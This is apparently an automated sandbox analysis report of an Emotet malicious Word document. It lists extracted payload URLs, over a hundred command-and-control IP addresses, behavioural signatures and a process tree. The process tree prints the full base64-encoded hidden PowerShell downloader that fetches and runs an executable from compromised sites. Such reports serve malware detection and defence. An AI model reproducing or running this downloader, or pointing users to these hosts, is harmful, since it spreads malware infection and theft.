Analysis
-
max time kernel
29s -
resource
win10v191014 -
submitted
14-12-2019 01:11
General
Malware Config
Extracted
https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/
https://www.wenkawang.com/data/bofze0s-7ji4-15/
https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/
http://ma.jopedu.com/img/8z8dl-3xn-655019278/
http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/
Extracted
emotet
108.184.9.44:80
88.247.26.78:80
181.46.176.38:80
164.68.115.146:8080
5.189.148.98:8080
46.105.128.215:8080
69.30.205.162:7080
46.105.131.68:8080
85.235.219.74:80
37.46.129.215:8080
153.190.41.185:80
115.179.91.58:80
100.38.11.243:80
119.57.36.54:8080
124.150.175.129:8080
139.59.12.63:8080
82.146.55.23:7080
123.142.37.165:80
95.216.212.157:8080
200.41.121.69:443
186.84.173.136:8080
175.127.140.68:80
190.5.162.204:80
45.129.121.222:443
91.117.31.181:80
87.9.181.247:80
190.101.87.170:80
67.254.196.78:443
103.122.75.218:80
211.218.105.101:80
187.233.220.93:443
86.70.224.211:80
77.245.12.212:80
181.47.235.26:993
190.171.135.235:80
212.129.14.27:8080
37.59.24.25:8080
78.46.87.133:8080
201.183.251.100:80
181.44.166.242:80
46.17.6.116:8080
158.69.167.246:8080
182.176.116.139:995
78.186.102.195:80
95.255.140.89:443
67.171.182.231:80
81.82.247.216:80
189.61.200.9:443
24.27.122.202:80
86.6.123.109:80
162.144.46.90:8080
89.215.225.15:80
216.75.37.196:8080
92.16.222.156:80
191.100.24.201:50000
200.71.112.158:53
165.100.148.200:443
189.225.211.171:443
72.69.99.47:80
59.158.164.66:443
72.27.212.209:8080
210.224.65.117:80
98.15.140.226:80
110.2.118.164:80
124.150.175.133:80
120.51.83.89:443
60.53.3.153:8080
212.112.113.235:80
24.28.178.71:80
128.92.54.20:80
37.70.131.107:80
201.196.15.79:990
175.103.239.50:80
195.250.143.182:80
190.161.67.63:80
72.51.153.27:80
192.241.220.183:8080
192.161.190.171:8080
187.250.92.82:80
190.189.79.73:80
113.52.135.33:7080
185.244.167.25:443
192.210.217.94:8080
82.79.244.92:80
50.116.78.109:8080
96.234.38.186:8080
188.230.134.205:80
172.90.70.168:443
190.146.14.143:443
58.93.151.148:80
217.181.139.237:443
110.142.161.90:80
163.172.97.112:8080
83.110.107.243:443
172.104.70.207:8080
51.38.134.203:8080
142.93.87.198:8080
91.117.131.122:80
193.33.38.208:443
203.153.216.178:7080
23.253.207.142:8080
95.216.207.86:7080
221.154.59.110:80
119.159.150.176:443
42.51.192.231:8080
178.134.1.238:80
1.32.54.12:8080
86.98.157.3:80
85.109.190.235:443
177.103.201.23:80
220.78.29.88:80
177.103.240.93:80
138.197.140.163:8080
176.58.93.123:80
51.77.113.97:8080
83.156.88.159:80
210.111.160.220:80
41.77.74.214:443
174.57.150.13:8080
78.187.204.70:80
Signatures
-
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4956 WINWORD.EXE 4740 306.exe 4396 306.exe 3880 mailboxmethods.exe 3788 mailboxmethods.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4576 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4576 Powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 4740 306.exe 4396 306.exe 3880 mailboxmethods.exe 3788 mailboxmethods.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4956 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4956 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3820 wrote to memory of 4060 3820 SppExtComObj.exe 76 PID 4576 wrote to memory of 4740 4576 Powershell.exe 80 PID 4740 wrote to memory of 4396 4740 306.exe 81 PID 3880 wrote to memory of 3788 3880 mailboxmethods.exe 83 -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4396 306.exe 3788 mailboxmethods.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\306.exe => C:\Windows\SysWOW64\mailboxmethods.exe 306.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\11c79b8c334489b77dbf70bc4c120ee3a85829147cb318744cb74a69f4b4dc61.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:4956
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABKAGIAagBkAG0AcgBrAGYAPQAnAFcAdgB4AG8AagBqAHgAeQAnADsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAIAA9ACAAJwAzADAANgAnADsAJABHAHgAZAB1AG8AYwBkAGoAYwBqAHQAPQAnAEIAawBmAGsAYgBvAGYAaQBwAHAAYwB6AHQAJwA7ACQATQBiAGsAbQBvAG8AbgBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAKwAnAC4AZQB4AGUAJwA7ACQAVQBlAGYAYwB6AHAAYwBkAGYAaQB4AG8APQAnAFIAcQBkAGsAegBtAHkAZABtAHcAdAB3AGYAJwA7ACQASQB5AGIAbgBwAHkAdABmAGEAcABtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAA9ACcAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAaQBlAGcAbwBoAG8AbQBlAHYAYQBsAHUAZQBzAC4AYwBvAG0ALwBlAG4AZwBsAC8ANABkAGUALQBrAHoAcwB5AGgAdQAtADcANgA4ADYAMQAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB3AGUAbgBrAGEAdwBhAG4AZwAuAGMAbwBtAC8AZABhAHQAYQAvAGIAbwBmAHoAZQAwAHMALQA3AGoAaQA0AC0AMQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBiAHIAdQBpAGQAcwBmAG8AdABvAGcAcgBhAGEAZgAtAHUAdAByAGUAYwBoAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFEATAB2AEYATAB5AC8AKgBoAHQAdABwADoALwAvAG0AYQAuAGoAbwBwAGUAZAB1AC4AYwBvAG0ALwBpAG0AZwAvADgAegA4AGQAbAAtADMAeABuAC0ANgA1ADUAMAAxADkAMgA3ADgALwAqAGgAdAB0AHAAOgAvAC8AcABhAHkALgBqAG8AcABlAGQAdQAuAGMAbwBtAC8AVABoAGkAbgBrAFAASABQAC8AbAA5AG8AawBjAGcAdQBoADYALQBiADkAbgBuAHIAaAA3AC0AOQA2ADIANAA1ADUAMgA0AC8AJwAuACIAUwBgAFAATABJAFQAIgAoACcAKgAnACkAOwAkAEEAdgB2AGgAawBvAHkAZQByAD0AJwBaAGcAegBiAGQAegB5AG0AeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBjAHIAbgBkAHEAZgBtAGYAbQBlACAAaQBuACAAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAApAHsAdAByAHkAewAkAEkAeQBiAG4AcAB5AHQAZgBhAHAAbQAuACIAZABPAGAAVwBuAGwAbwBhAEQAZgBgAEkAbABlACIAKAAkAFIAYwByAG4AZABxAGYAbQBmAG0AZQAsACAAJABNAGIAawBtAG8AbwBuAGcAKQA7ACQAUAB0AGkAdQBxAHIAaQBqAGQAawBsAHYAZQA9ACcASAB3AGgAcwBtAGwAegBzACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATQBiAGsAbQBvAG8AbgBnACkALgAiAEwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAwADMAMAA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgBUACIAKAAkAE0AYgBrAG0AbwBvAG4AZwApADsAJABMAHMAdAB4AHMAcwBpAGEAPQAnAFkAcAB5AGgAdgBoAGgAdwAnADsAYgByAGUAYQBrADsAJABWAG4AYQBzAGIAZgBmAG0AbwBxAD0AJwBDAG0AZwBxAHAAZwBzAHMAbgBkAGkAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAGwAcgBlAHIAdgB6AGgAaQA9ACcAQgB2AG4AbQB2AG0AcABhAGQAbgBsAGIAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Users\Admin\306.exe"C:\Users\Admin\306.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\306.exe--327155173⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4396
-
-
-
C:\Windows\SysWOW64\mailboxmethods.exe"C:\Windows\SysWOW64\mailboxmethods.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\mailboxmethods.exe--43cbf7f02⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:3788
-